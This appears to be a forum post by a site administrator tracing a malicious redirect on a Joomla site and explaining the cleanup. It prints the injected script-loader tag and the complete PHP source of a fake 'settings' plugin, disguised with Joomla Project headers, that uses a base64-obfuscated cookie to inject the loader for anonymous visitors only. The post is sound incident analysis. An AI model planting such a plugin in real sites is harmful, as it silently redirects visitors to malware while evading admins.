I found this webpage useful to start with: https://www.getastra.com/blog/911/joomla-malicious-redirects/
My next step was to see if I can get the source code for the redirect happening. I used https://www.view-page-source.com/ to get the source code anonymously hoping it would trigger and it did!
The malware injected the following into the head:
<script src="https://code.jquery.com/jquery-3.3.1.min.js"></script>
<script>
var khutmhpx = document.createElement("script");
khutmhpx.src = "https://[URL-REMOVED]";
document.getElementsByTagName("head")[0].appendChild(khutmhpx);
</script>
I then searched the whole Joomla php source code for "khutmhpx" and found a Joomla plugin called "settings" located at "plugins/system/settings/settings.php" which had been installed and activated. Looking at the initialization of this plugin and its only purpose was the following:
<?php
/**
* @Enterprise: Joomla! Project
* @author: Joomla! Project
* @url: http://www.github.com
* @license: GNU/GPLv3 http://www.gnu.org/licenses/gpl-3.0.html
* @copyright: github.com
*
* Custom settings plugin;
* https://github.com
* License: MIT License
*/
defined('_JEXEC') or die;
class plgSystemSettings extends JPlugin
{
public function onAfterInitialise()
{
$user = JFactory::getUser();
$mainframe = JFactory::getApplication();
if ( $user -> id > 0 ) {
// user route
} else {
// non-user route
$current_url = JUri::getInstance();
if (stristr($current_url, "/admin")) {
// admin-panel route
} else {
if ( ! isset( $_COOKIE[base64_decode('cl9vaw==')]) ) {
setcookie( base64_decode( 'cl9vaw==' ), 1, time() + 86400, base64_decode( 'Lw==' ) );
echo '<script src="https://code.jquery.com/jquery-3.3.1.min.js"></script>
<script>
var khutmhpx = document.createElement("script");
khutmhpx.src = "https://[URL-REMOVED]";
document.getElementsByTagName("head")[0].appendChild(khutmhpx);
</script>
';
}
}
}
}
}
To summarise what this code is doing:
IF:
- The visitor is not logged in.
- Not visiting /admin
- "the cookie" is not present
THEN:
- Set a cookie which expires in 1 day.
- Inject javascript into the head of the page, which loads a script from another URL.
The script from another URL contains a redirection code to the malware of their choosing.
To fix, I zipped/backed up the settings directory and then deleted it.